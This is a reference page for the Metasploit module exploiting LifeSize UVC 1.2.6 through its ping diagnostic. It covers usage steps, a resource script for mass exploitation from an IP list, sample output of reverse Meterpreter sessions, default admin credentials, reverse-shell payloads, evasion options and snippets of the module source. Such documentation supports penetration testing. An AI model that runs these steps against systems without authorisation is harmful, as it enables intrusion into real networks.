LifeSize UVC Authenticated RCE via Ping - Metasploit


This page contains detailed information about how to use the exploit/linux/http/lifesize_uvc_ping_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: LifeSize UVC Authenticated RCE via Ping
Module: exploit/linux/http/lifesize_uvc_ping_rce
Source code: modules/exploits/linux/http/lifesize_uvc_ping_rce.rb
Disclosure date: 2014-03-21
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

When authenticated as an administrator on LifeSize UVC 1.2.6, an attacker can abuse the ping diagnostic functionality to achieve remote command execution as the www-data user (or equivalent).

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using lifesize_uvc_ping_rce against a single host

Normally, you can use exploit/linux/http/lifesize_uvc_ping_rce this way:

msf > use exploit/linux/http/lifesize_uvc_ping_rce
msf exploit(lifesize_uvc_ping_rce) > show targets
    ... a list of targets ...
msf exploit(lifesize_uvc_ping_rce) > set TARGET target-id
msf exploit(lifesize_uvc_ping_rce) > show options
    ... show and set options ...
msf exploit(lifesize_uvc_ping_rce) > exploit

Using lifesize_uvc_ping_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your lifesize_uvc_ping_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/lifesize_uvc_ping_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/lifesize_uvc_ping_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/lifesize_uvc_ping_rce

msf6 exploit(linux/http/lifesize_uvc_ping_rce) > show info

       Name: LifeSize UVC Authenticated RCE via Ping
     Module: exploit/linux/http/lifesize_uvc_ping_rce
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-03-21

Provided by:
  Brandon Perry <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   LifeSize UVC version <= 1.2.6

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   admin123         yes       The password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             yes       Use SSL
  TARGETURI  /                yes       The URI of the vulnerable instance
  USERNAME   administrator    yes       The username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  When authenticated as an administrator on LifeSize UVC 1.2.6, an 
  attacker can abuse the ping diagnostic functionality to achieve 
  remote command execution as the www-data user (or equivalent).

References:
  https://www.exploit-db.com/exploits/32437

Module Options


This is a complete list of options available in the linux/http/lifesize_uvc_ping_rce exploit:

msf6 exploit(linux/http/lifesize_uvc_ping_rce) > show options

Module options (exploit/linux/http/lifesize_uvc_ping_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin123         yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The URI of the vulnerable instance
   USERNAME   administrator    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   LifeSize UVC version <= 1.2.6

Advanced Options


Here is a complete list of advanced options supported by the linux/http/lifesize_uvc_ping_rce exploit:

msf6 exploit(linux/http/lifesize_uvc_ping_rce) > show advanced

Module advanced options (exploit/linux/http/lifesize_uvc_ping_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/lifesize_uvc_ping_rce module can exploit:

msf6 exploit(linux/http/lifesize_uvc_ping_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   LifeSize UVC version <= 1.2.6

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/lifesize_uvc_ping_rce exploit:

msf6 exploit(linux/http/lifesize_uvc_ping_rce) > show payloads

Compatible Payloads
===================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   1  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/lifesize_uvc_ping_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/lifesize_uvc_ping_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

58:	    res = send_request_cgi({
59:	      'uri' => normalize_uri(target_uri.path, 'accounts', 'login/')
60:	    })
61:	
62:	    if !res or !res.body
63:	      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
64:	    end
65:	
66:	    if res.code != 200
67:	      fail_with(Failure::UnexpectedReply, "Did not get a 200 response, perhaps the server isn't on an SSL port")
68:	    end

Did not get a 200 response, perhaps the server isn't on an SSL port


Here is a relevant code snippet related to the "Did not get a 200 response, perhaps the server isn't on an SSL port" error message:

62:	    if !res or !res.body
63:	      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
64:	    end
65:	
66:	    if res.code != 200
67:	      fail_with(Failure::UnexpectedReply, "Did not get a 200 response, perhaps the server isn't on an SSL port")
68:	    end
69:	
70:	    token = /name='csrfmiddlewaretoken' value='(.*)'/.match(res.body)
71:	
72:	    if token.length < 2

Could not find token on page.


Here is a relevant code snippet related to the "Could not find token on page." error message:

68:	    end
69:	
70:	    token = /name='csrfmiddlewaretoken' value='(.*)'/.match(res.body)
71:	
72:	    if token.length < 2
73:	      fail_with(Failure::UnexpectedReply, "Could not find token on page.")
74:	    end
75:	
76:	    token = token[1]
77:	
78:	    post = {

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

91:	      },
92:	      'cookie' => 'csrftoken=' + token
93:	    })
94:	
95:	    if !res
96:	      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
97:	    end
98:	
99:	    #we want a 302, 200 means we are back at login page
100:	    if res.code == 200
101:	      fail_with(Failure::NoAccess, "Authentication failed. Please check your username and password.")

Authentication failed. Please check your username and password.


Here is a relevant code snippet related to the "Authentication failed. Please check your username and password." error message:

96:	      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
97:	    end
98:	
99:	    #we want a 302, 200 means we are back at login page
100:	    if res.code == 200
101:	      fail_with(Failure::NoAccess, "Authentication failed. Please check your username and password.")
102:	    end
103:	
104:	    cookie = res.get_cookies
105:	
106:	    new_cookie = 'csrftoken=' + token + '; ' + cookie

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

109:	      'uri' => normalize_uri(target_uri.path, 'server-admin', 'operations', 'diagnose', 'ping/'),
110:	      'cookie' => new_cookie
111:	    })
112:	
113:	    if !res or !res.body
114:	      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
115:	    end
116:	
117:	    token = /name='csrfmiddlewaretoken' value='(.*)'/.match(res.body)
118:	    token = token[1]
119:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Brandon Perry <bperry.volatile[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.